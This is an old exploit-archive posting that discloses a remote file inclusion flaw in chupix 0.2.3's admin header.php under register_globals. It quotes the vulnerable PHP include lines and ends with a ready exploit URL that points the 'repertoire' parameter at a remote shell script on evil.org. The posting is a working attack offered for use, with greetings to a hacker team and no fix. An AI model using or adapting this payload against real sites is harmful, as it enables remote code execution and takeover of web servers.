Home / os / solaris

chupix-rfi.txt

Posted on 28 September 2007

#chupix 0.2.3 /admin/include/header.php RFI #f0und by 0in #contact: 0in.email@gmail.com #Greetings to:Die-angel,Slim,Joker186,Kaja,Artysta,wojto111,reydex #team:Our Dark-Coders team;] -------------------------------------------------------------------------------------------------------------------- #register_globals=On BUG: include($repertoire .'db/config/config.php'); // lecture de la configuration souhaitée par l'utilisateur include($repertoire .'include/template.php'); // classe de création des templates include($repertoire .'include/MyTxt.php'); // inclusion de la classe MyTxt $path_lang = $repertoire ."langues/". $conf__lang ."/admin.php"; include($path_lang); // Chargement du fichier de langues EXPLOIT: http://x.com/[patch]/admin/include/header.php?repertoire=http://evil.org/shell.txt ? --------------------------------------------------------------------------------------------------------------------

 

TOP